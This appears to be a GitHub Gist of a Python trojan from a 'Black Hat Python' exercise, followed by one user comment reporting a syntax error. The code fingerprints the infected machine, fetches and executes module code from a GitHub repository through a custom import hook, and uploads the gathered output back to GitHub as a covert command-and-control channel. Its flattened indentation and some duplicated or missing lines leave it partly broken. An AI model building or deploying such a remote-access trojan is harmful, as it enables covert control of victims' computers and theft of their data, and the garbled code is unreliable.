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Created November 5, 2017 13:00
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  • Save ismailakkila/b84ca7ffdecfb650c11f4a09535de530 to your computer and use it in GitHub Desktop.
Save ismailakkila/b84ca7ffdecfb650c11f4a09535de530 to your computer and use it in GitHub Desktop.
from github3 import login
from datetime import datetime
from uuid import getnode
import platform
import base64
import json
import imp
import queue
import threading
import random
import sys
import _strptime
import time
#Define global variables
gh_username = "your_username"
gh_password = "you_password"
gh_repo = "blackhatpython-ch7"
gh_remote = "data/"
#We generate a trojan_id. If this id is not available in our github config folder,
#we will resort to using the default config file for this trojan.
#We define some other constants related to the trojan
trojan_id = base64.b64encode((platform.node() + "-" + hex(getnode())).encode()).decode("utf-8")
trojan_id_default = base64.b64encode("default".encode()).decode("utf-8")
trojan_config_file_path = f"config/{trojan_id}.json"
trojan_default_config_file_path = f"config/{trojan_id_default}.json"
trojan_module_folder_path = "modules/"
trojan_output_file_name = datetime.utcnow().isoformat() + "-" + trojan_id
trojan_output_file_path = "data/" + trojan_output_file_name
trojan_output_file_contents = ""
task_queue = queue.Queue()
#GitImporter Class to allow import of our custom python modules from github
class GitImporter(object):
def __init__(self):
self.module_code = None
def find_module(self, name, path=None):
module_file_contents = get_file_contents(trojan_module_folder_path + name + ".py")
if module_file_contents:
self.module_code = module_file_contents
return self
def load_module(self, name):
new_module = imp.new_module(name)
exec(self.module_code, new_module.__dict__)
sys.modules[name] = new_module
return new_module
#Connect to Github Function and return its object, along with repository and branch objects
def gh_connect():
gh = login(username=gh_username, password=gh_password)
repo = gh.repository(gh_username, gh_repo)
branch = repo.branch("master")
return gh, repo, branch
#Grab the file contents according to the path location. The file is encoded in base64 so it needs to be decoded
#If there is a problem or file is not found, return None
def get_file_contents(file_path):
gh, repo, branch = gh_connect()
if gh and repo and branch:
hash_list = branch.commit.commit.tree.recurse().tree
for hash in hash_list:
if file_path in hash.path:
file_contents_b64 = repo.blob(hash.sha).content
file_contents = base64.b64decode(file_contents_b64).decode("utf-8")
return file_contents
return None
#Grab the file sha according to the path location.
#If there is a problem or file is not found, return None
def get_file_sha(file_path):
gh, repo, branch = gh_connect()
if gh and repo and branch:
hash_list = branch.commit.commit.tree.recurse().tree
for hash in hash_list:
if file_path in hash.path:
return hash.sha
return None
#This method will load the modules in the trojan config file from either sys.modules
#or resort to importing from github using the GitImporter class. The method will return
#the parsed dict to allow executing the imported modules
def load_trojan_config():
global trojan_output_file_contents
def load_modules(config_file_path, config_file_contents):
global trojan_output_file_contents
trojan_config_file_json = json.loads(config_file_contents)
for module_dict in trojan_config_file_json:
module = module_dict["module"]
if module not in sys.modules:
exec(f"import {module}")
loaded_modules.append({"loaded_module": module})
loaded_modules.append({"loaded_module": module})
if len(loaded_modules) == len(trojan_config_file_json):
trojan_output_file_contents += f"[*] Successful Modules Import From: {config_file_path}\n"
return trojan_config_file_json
return None
loaded_modules = []
trojan_default_config_file_contents = get_file_contents(trojan_default_config_file_path)
trojan_config_file_contents = get_file_contents(trojan_config_file_path)
if trojan_default_config_file_contents and trojan_config_file_contents:
trojan_output_file_contents += "[*] Using Specific Modules\n"
return load_modules(trojan_config_file_path, trojan_config_file_contents)
trojan_output_file_contents += "[*] Using Default Modules\n"
return load_modules(trojan_default_config_file_path, trojan_default_config_file_contents)
#Simple method to run each module within the trojan config file
def run_module(module):
global trojan_output_file_contents
result = sys.modules[module].run()
trojan_output_file_contents += result + "\n"
#Method to create or update the trojan exfiltrated data obtained from running the modules to github.
def store_output():
global trojan_output_file_contents
gh, repo, branch = gh_connect()
sha = get_file_sha(trojan_output_file_path)
if sha:
repo.update_file(trojan_output_file_path, trojan_output_file_name, base64.b64encode(trojan_output_file_contents.encode()), sha)
repo.create_file(trojan_output_file_path, trojan_output_file_name, base64.b64encode(trojan_output_file_contents.encode()))
#Required to allow module import from github
sys.meta_path = [GitImporter()]
#main trojan loop
while True:
trojan_output_file_contents += (100 * "*") + "\n"
trojan_output_file_contents += f"[*] Running On: {platform.node() + '-' + hex(getnode())}\n"
trojan_output_file_contents += f"[*] Time: {datetime.utcnow().isoformat()}\n"
if task_queue.empty():
loaded_config_file_json = load_trojan_config()
if loaded_config_file_json:
for loaded_module in loaded_config_file_json:
run_module_thread = threading.Thread(target=run_module, args=(loaded_module["module"],))
time.sleep(random.randint(1, 10))
trojan_output_file_contents += "[*] Finished Executing Modules\n"
#sleep_time = random.randint(60,120)
sleep_time = 10
trojan_output_file_contents += f"[*] Sleeping For {sleep_time} Seconds\n"
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drog0n commented May 30, 2019

File "", line 28
trojan_config_file_path = f"config/{trojan_id}.json"
SyntaxError: invalid syntax

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